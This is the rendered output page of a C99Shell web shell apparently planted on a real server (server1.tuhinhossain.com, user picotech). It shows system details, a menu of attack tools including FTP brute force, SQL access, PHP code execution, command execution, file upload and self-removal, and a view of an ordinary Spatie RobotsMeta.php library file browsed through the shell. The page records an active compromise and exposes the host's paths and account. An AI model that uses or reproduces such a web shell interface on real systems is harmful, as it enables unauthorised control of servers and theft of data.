!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/classify.picotech.app/public_html/vendor/spatie/robots-txt/src/   drwxr-xr-x
Free 28.89 GB of 117.98 GB (24.49%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     RobotsMeta.php (1.81 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Spatie\Robots;

use 
InvalidArgumentException;
use 
JetBrains\PhpStorm\ArrayShape;

class 
RobotsMeta
{
    protected array 
$robotsMetaTagProperties = [];

    public static function 
readFrom(string $source): self
    
{
        
$content = @file_get_contents($source);

        if (
$content === false) {
            throw new 
InvalidArgumentException("Could not read from source `{$source}`");
        }

        return new 
self($content);
    }

    public static function 
create(string $source): self
    
{
        return new 
self($source);
    }

    public function 
__construct(string $html)
    {
        
$this->robotsMetaTagProperties $this->findRobotsMetaTagProperties($html);
    }

    public function 
mayIndex(): bool
    
{
        return ! 
$this->noindex();
    }

    public function 
mayFollow(): bool
    
{
        return ! 
$this->nofollow();
    }

    public function 
noindex(): bool
    
{
        return 
$this->robotsMetaTagProperties['noindex'] ?? false;
    }

    public function 
nofollow(): bool
    
{
        return 
$this->robotsMetaTagProperties['nofollow'] ?? false;
    }

    #[
ArrayShape(['noindex' => "bool"'nofollow' => "bool"])]
    protected function 
findRobotsMetaTagProperties(string $html): array
    {
        
$metaTagLine $this->findRobotsMetaTagLine($html);

        return [
            
'noindex' => $metaTagLine
                
strpos(strtolower($metaTagLine), 'noindex') !== false
                
false,

            
'nofollow' => $metaTagLine
                
strpos(strtolower($metaTagLine), 'nofollow') !== false
                
false,
        ];
    }

    protected function 
findRobotsMetaTagLine(string $html): ?string
    
{
        if (
preg_match('/\<meta name=("|\')robots("|\').*?\>/mis'$html$matches)) {
            return 
$matches[0];
        }

        return 
null;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0038 ]--